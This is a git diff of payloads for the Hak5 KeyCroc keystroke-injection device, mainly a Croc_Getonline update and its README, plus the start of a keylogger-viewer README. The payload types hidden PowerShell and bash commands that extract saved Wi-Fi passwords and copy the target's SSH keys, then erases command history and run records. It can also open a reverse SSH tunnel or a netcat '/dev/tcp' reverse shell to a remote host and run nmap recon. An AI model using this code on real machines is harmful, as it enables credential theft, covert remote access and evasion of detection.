diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt index 64009c0..c80cb60 100644 --- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt +++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt @@ -1,118 +1,468 @@ # Title: Croc_Getonline # Description: Attempt to connect Keycroc automatically to target wifi access point -# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt +# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 3.5 +# Version: 4.3 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro -MATCH (getonline_W|getonline_R|getonline_L) +# getonline_W <-- MATCH word for windows, Attempt connection to access point +# getonline_L <-- MATCH word for Linux, Attempt connection to access point +# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point +# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD ) +# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID +# getonline_K <-- MATCH word for killing keycroc wlan0 interface +# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE +# getonline_H <-- MATCH word for entering ATTACKMODE HID +# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL +# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET +# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot +# getonline_T <-- MATCH word for Stopping ICMP/PORT alert -CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) -for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done +# option=0 Run payload as normal +# option=1 Run payload as normal, open terminal on target +# option=2 Run payload as normal, start reverse SSH tunnel using SSH +# option=3 Run payload as normal, start reverse SSH tunnel using NETCAT +# option=4 Run payload as normal, open web page -wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt +MATCH getonline+_[A-Z]{1} +QUACK LOCK -if [ -f $wifi_pass ]; then - cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt - rm -f $wifi_pass +#---> Edit payload option below +option=0 +keycroc_password=hak5croc +wifi_pass=/tools/wifipass.txt +web_page=https://forums.hak5.org/ + +#---> Edit remote host below +remote_user_name=EDIT_REMOTE_USERNAME_HERE +remote_host_ip=EDIT_REMOTE_HOST_IP_HERE +remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE +port=7000 + +#---> Edit known SSID and password below +known_ssid=EDIT_KNOWN_SSID_HERE +known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE + +#---> Edit recon scan on/off below & nmap +recon=off +nmap_scan="nmap -T4 -F" +recon_loot=/root/udisk/tools/Target_SSID.txt + +#---> Edit ICMP/PORT alert on/off below & iptables time out +alert=off +alert_time=60 + +#---> Edit target password below +if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then + target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) +else + target_password=ENTER_TARGET_PASSWORD_HERE fi -ATTACKMODE HID STORAGE -Q DELAY 5000 -LED ATTACK +recon_scan() { + if [ "$recon" = "on" ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY\" || :" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi + elif [ "$recon" = "off" ]; then + : + else + : + fi +} + +ENTER_STORAGE() { + if [ -f ~/udisk$wifi_pass ]; then + cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt + rm -f ~/udisk$wifi_pass + fi + ATTACKMODE HID STORAGE + QUACK DELAY 5000 + LED ATTACK +} + +RESET_PAYLOAD() { + QUACK UNLOCK + sleep 5 ; LED OFF + killall -9 bash + killall -9 python + sleep 1 + RELOAD_PAYLOADS +} + +CLEAN_UP() { + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "history -c ; rm -f ~/.bash_history" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi +} + +calculate_network_range() { + ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-) + netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" + IFS=. read -r m1 m2 m3 m4 <<< "$netmask" + network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" +} case $LOOT in getonline_W) - Q GUI r - Q DELAY 3000 - Q STRING "powershell -NoP -NonI -W Hidden" - Q ENTER - Q DELAY 5000 - Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" - Q ENTER - Q DELAY 3000 - Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" - Q ENTER - Q DELAY 2000 - Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" - Q ENTER - Q DELAY 2000 - Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" - Q ENTER - Q DELAY 5000 - Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK GUI r + QUACK DELAY 3000 + QUACK STRING "powershell -NoP -NonI -W Hidden" + QUACK ENTER + QUACK DELAY 5000 + QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" + QUACK ENTER + QUACK DELAY 3000 + QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\"" + QUACK ENTER + QUACK DELAY 5000 + recon_scan + CLEAN_UP + QUACK STRING "exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_R) - Q CONTROL-ALT-d - Q CONTROL-ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "umount \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_L) - if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then - PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$target_password" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "sudo umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID +;; + getonline_N) + LED B + sleep 2 + echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass +;; + getonline_F) + if [ -f ~/udisk$wifi_pass ]; then + LED B + sleep 2 else - PC_PW=LINUX + LED R + RESET_PAYLOAD fi - Q CONTROL-ALT-d - Q ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" - Q ENTER - Q DELAY 2000 - Q STRING "$PC_PW" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "sudo umount \$MOUNT_POINT ; exit" - Q ENTER +;; + getonline_K) + LED R + ifconfig wlan0 down + RESET_PAYLOAD +;; + getonline_S) + ATTACKMODE HID STORAGE + sleep 3 + RESET_PAYLOAD +;; + getonline_H) + ATTACKMODE HID + sleep 3 + RESET_PAYLOAD +;; + getonline_P) + ATTACKMODE HID SERIAL + sleep 3 + RESET_PAYLOAD +;; + getonline_A) + ATTACKMODE HID AUTO_ETHERNET + sleep 3 + RESET_PAYLOAD +;; + getonline_X) + LED R + rm -f /root/udisk/payloads/Croc_getonline.txt + rm -f /root/udisk$wifi_pass /root/udisk/tools/old_wifipass.txt + rm -f $recon_loot root/udisk/config.txt + rm -f /root/udisk/tools/firewall-rules-backup.txt + rm -r /root/udisk/tools/Target_SSH_KEY + apt -y remove sshpass + reboot --force + RESET_PAYLOAD +;; + getonline_T) + if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then + if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then + kill -9 "$(sed -n 1p /tmp/port_pid.txt)" + fi + if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then + kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)" + fi + killall -9 tcpdump + sleep 1 + else + : + fi + RESET_PAYLOAD +;; + *) + LED R + sleep 1 + LED OFF + RESET_PAYLOAD ;; esac - -ATTACKMODE HID sleep 3 -LED SETUP -kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) +word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w) +if [[ $word_count -eq 2 ]]; then + ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)" + matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')" + sleep 1 + if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then + LED SETUP + else + LED R + RESET_PAYLOAD + fi +else + LED R + RESET_PAYLOAD +fi + +kill -9 $(pidof wpa_supplicant) +kill -9 $(pidof dhclient) ifconfig wlan0 down if [ "$LOOT" = "getonline_W" ]; then - sed -i '0,/./s/^.//' $wifi_pass - sed -i 's/\r//g' $wifi_pass + sed -i '0,/./s/^.//' ~/udisk$wifi_pass + sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass + sed -i 's/\r//g' ~/udisk$wifi_pass fi -sed -i 's/\( \)*/\1/g' $wifi_pass -sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt -sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt -wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf +sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass +sed -i -E -e '/^[WS]/d' -e '14 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt +sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};15{G;s/\n(\S+).*/ \1/};16{G;s/\n\S+//}' root/udisk/config.txt +wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf + ifconfig wlan0 up -wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 +wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf +dhclient wlan0 sleep 3 systemctl restart ssh.service -[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R +if : >/dev/tcp/8.8.8.8/53; then + if [ $option -eq 0 ]; then + : + elif [ $option -eq 1 ]; then + case "$LOOT" in + getonline_W) + QUACK GUI m + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 5000 + ;; + getonline_R) + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + ;; + getonline_L) + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + ;; + esac + QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$keycroc_password" + QUACK ENTER + elif [ $option -eq 2 ]; then + status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" + [ $? = 0 ] || [ "$status" = installed ] && : || apt --force-yes install sshpass + sleep 1 + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + [ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa + sleep 1 + sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + sleep 3 + ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip + else + LED R + sleep 1 + fi + elif [ $option -eq 3 ]; then + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + /bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 & + else + LED R + sleep 1 + fi + elif [ $option -eq 4 ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK GUI d + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Start-Process $web_page & exit" + QUACK ENTER + elif [ "$LOOT" = "getonline_R" ]; then + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "xdg-open $web_page & exit" + QUACK ENTER + elif [ "$LOOT" = "getonline_L" ]; then + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "xdg-open $web_page & exit" + QUACK ENTER + fi + else + LED FINISH + fi + LED FINISH +else + LED R +fi + +if [ "$recon" = "on" ]; then + LED C SLOW + echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot + ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass) + iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot + echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot + ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot + cat /etc/resolv.conf | grep nameserver >> $recon_loot + + perform_nmap_scan() { + echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot + $nmap_scan $network_range >> $recon_loot + } + calculate_network_range + perform_nmap_scan + + echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot + curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot + echo -ne "\n\n" >> $recon_loot +elif [ "$recon" = "off" ]; then + : +else + : +fi + +if [ "$alert" = "on" ]; then + icmp_alert() { + calculate_network_range + sleep 1 + until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address''); do + : + done + LED R SLOW + iptables -F + iptables -A OUTPUT -p icmp --icmp-type any -j DROP + sleep $alert_time + iptables-restore < /root/udisk/tools/firewall-rules-backup.txt + LED B ; sleep 2 ; LED OFF + icmp_alert & echo -ne $! > /tmp/icmp_pid.txt + } + port_alert() { + ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-) + file=/tmp/tcpdump.out + until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do + : + done + LED R SLOW + iptables -F + iptables -P INPUT DROP + iptables -P OUTPUT DROP + iptables -P FORWARD DROP + sleep $alert_time + iptables-restore < /root/udisk/tools/firewall-rules-backup.txt + LED B ; sleep 2 ; LED OFF + port_alert & echo -ne $! > /tmp/port_pid.txt + } + iptables-save > /root/udisk/tools/firewall-rules-backup.txt + icmp_alert & echo -ne $! > /tmp/icmp_pid.txt + port_alert & echo -ne $! > /tmp/port_pid.txt + LED B +elif [ "$alert" = "off" ]; then + : +else + : +fi + sleep 3 LED OFF +QUACK UNLOCK diff --git a/payloads/library/credentials/Croc_Getonline/README.md b/payloads/library/credentials/Croc_Getonline/README.md index 17db8c2..7153625 100644 --- a/payloads/library/credentials/Croc_Getonline/README.md +++ b/payloads/library/credentials/Croc_Getonline/README.md @@ -1,8 +1,9 @@ # Croc_Getonline ## INTRODUCTION : - - This project is developed for the HAK5 KeyCroc - - Attempt to connect Keycroc automatically to target wifi access point. + - This project is developed for the HAK5 KeyCroc. + - Attempt to connect Keycroc automatically to target wifi access point. OPTIONS Nmap, Iw, and Curl to gather essential network information and/or start Reverse SSH tunnel. + - Payload will use KeyCroc MATCH command to perform specific tasks. * **TESTED ON** - Windows 10 @@ -12,29 +13,99 @@ ## INSTALLATION : - Enter arming mode on your keycroc to install file. - - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder** + - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**. -## STARTING GETONLINE : +## STARTING CROC_GETONLINE : - - After install plug into target and type in anywhere - - **getonline_W** <-- MATCH word for windows - - **getonline_L** <-- MATCH word for Linux - - **getonline_R** <-- MATCH word for Raspberry pi - - When the payload is done running the LED will light up green - - Keycroc should now be connected to target wifi access point - - NOTE: for linux edit payload for passwd needed for sudo permission +After install plug into target and type in anywhere: + - **`getonline_W`** MATCH word for windows, Attempt connection to wifi access point + - **`getonline_L`** MATCH word for Linux, Attempt connection to wifi access point + - **`getonline_R`** MATCH word for Raspberry pi, Attempt connection to wifi access point + - **`getonline_N`** MATCH word for connecting to known SSID ( EDIT PAYLOAD ) + - **`getonline_F`** MATCH word for reset wlan0 interface to last known SSID + - **`getonline_K`** MATCH word for killing keycroc wlan0 interface + - **`getonline_S`** MATCH word for entering ATTACKMODE HID STORAGE + - **`getonline_H`** MATCH word for entering ATTACKMODE HID + - **`getonline_P`** MATCH word for entering ATTACKMODE HID SERIAL + - **`getonline_A`** MATCH word for entering ATTACKMODE HID AUTO_ETHERNET + - **`getonline_X`** MATCH word for Remove Croc_Getonline payload, contents and reboot + - **`getonline_T`** MATCH word for Stopping ICMP/PORT alert + +* **LED STATUS** + - **`LED WHITE`** Entering ATTACKMODE + - **`LED ATTACK`** Retrieving wifi access point credentials + - **`LED SETUP`** Configuring keycroc wlan0 interface to wifi access point + - **`LED GREEN`** Successful connection to wifi access point + - **`LED RED`** Payload failed + - **`LED CYAN`** Performing recon scan + - **`LED RED FLASH`** ICMP/PORT alert + +**NOTE:** for linux edit payload for password needed for sudo permission. + +## PAYLOAD OPTIONS : + +Editing payload variable options: +- **`option=0`** + + - This option will run payload as normal, attempt to connect Keycroc to wifi access point. + +- **`option=1`** + + - This option will run payload as normal, after a successful connection open terminal on target and start ssh session. + - ( EDIT PAYLOAD FOR KEYCROC PASSWORD ) + +- **`option=2`** + + - This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH. + - ( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" ) + - SSHPASS is a requirement for this option, payload will attempt to install if not installed. + +- **`option=3`** + + - This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. + - ( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) + +- **`option=4`** + + - This option will run payload as normal, after a successful connection open default browser and start web page. + - ( EDIT PAYLOAD FOR WEB SITE DEFAULT https://forums.hak5.org ) + +* **Configuring RECON scan with recon=on and recon=off** + +The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl. + +- **`recon=off`** + + - Suppresses active reconnaissance to maintain stealth. + - Useful for discreet scanning in sensitive environments. + +- **`recon=on`** + + - Initiates basic network reconnaissance scans. + - Utilizes Nmap, Iw, and Curl to gather essential network information and save to /root/udisk/tools/Target_SSID.txt. + +* **Configuring ICMP and Port Alerts with alert=on and alert=off** + +- **`alert=on`** + + - ICMP Alert: It blocks outgoing ICMP and UDP packets with specific destination ports (33434 and 33534) for a minute and then restores the original firewall rules. + - Port Alert: It drops incoming TCP packets with the SYN flag set for a minute and then restores the original firewall rules. + +- **`alert=off`** + + - If alert is set to off, the script does nothing ( : represents a null command in bash ). No alerts are set up. + +To summarize, ICMP and Port alerts when alert=on by using the icmp_alert() and port_alert() functions, respectively. It saves the current firewall rules to a backup file and runs the alert functions in the background, storing their respective PIDs in temporary files. If alert=off, the script does nothing related to alerts. ## PAYLOAD INFO : -**PowerShell script that performs the following actions:** +- **PowerShell script that performs the following actions:** Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet. Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet. +Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT and exits the script. -Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT. -Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script. - -**Bash script that performs the following actions:** +- **Bash script that performs the following actions:** Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc. Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID. @@ -42,7 +113,7 @@ Gets the password for the current wireless network by searching for the SSID in Writes the SSID and password to a file located at $MOUNT_POINT using tee. Unmounts the volume at $MOUNT_POINT using umount, and exits the script. -**Bash script that performs the following actions:** +- **Bash script that performs the following actions:** Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb. Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist. @@ -54,24 +125,24 @@ Unmounts the volume at $MOUNT_POINT using umount, and exits the script. Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc". -**-Sed command that performs the following actions:** +- **Sed command that performs the following actions:** By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus: -1{x;s#^#sed -n 1p wifipass.txt#e;x} +- 1{x;s#^#sed -n 1p wifipass.txt#e;x} -1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s +1{..} executes the commands between the ellipses on the first line of wifipass.txt. Commands are separated by ;'s x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space. s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only. x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space. -10{G;s/\n(\S+).*/ \1/} +- 10{G;s/\n(\S+).*/ \1/} 10{..} executes the commands between the ellipses on the tenth line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column. -11{G;s/\n\S+//} +- 11{G;s/\n\S+//} 11{..} executes the commands between the ellipses on the eleventh line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. diff --git a/payloads/library/general/Croc_Live/README.md b/payloads/library/general/Croc_Live/README.md new file mode 100644 index 0000000..89320fe --- /dev/null +++ b/payloads/library/general/Croc_Live/README.md @@ -0,0 +1,29 @@ +# Croc_Live + +Script Description: Keyboard Activity Monitor + +The following script serves as a tool to monitor and display keyboard activity, showing both previous keystrokes and live keystrokes in real-time. It operates in the terminal environment and relies on the presence of certain log files. + +- Display Previous Keystrokes: + - The script initiates by printing a message to the terminal, indicating that the previously recorded keystrokes are about to be displayed. + - It then searches for files named "croc_char.log" within the current directory and its subdirectories. + - All found log files are concatenated and their contents are displayed, revealing the previous keystrokes recorded in those files. + +- Waiting for Keyboard Activity: + - After displaying the previous keystrokes, the script enters a loop, continuously checking for the existence of the file "loot/croc_char.log". + - During this loop, it prints the message "Waiting for keyboard activity" and clears the line with each iteration. This creates an interactive waiting experience for users until keyboard activity is detected. + +- Show Live Keystrokes: + - Once the file "loot/croc_char.log" is present (indicating keyboard activity has started), the script proceeds. + - A 1-second pause occurs to allow time for the system to update or log any new keyboard activity. + - The terminal screen is then cleared to prepare for the display of live keystrokes. + - A message is 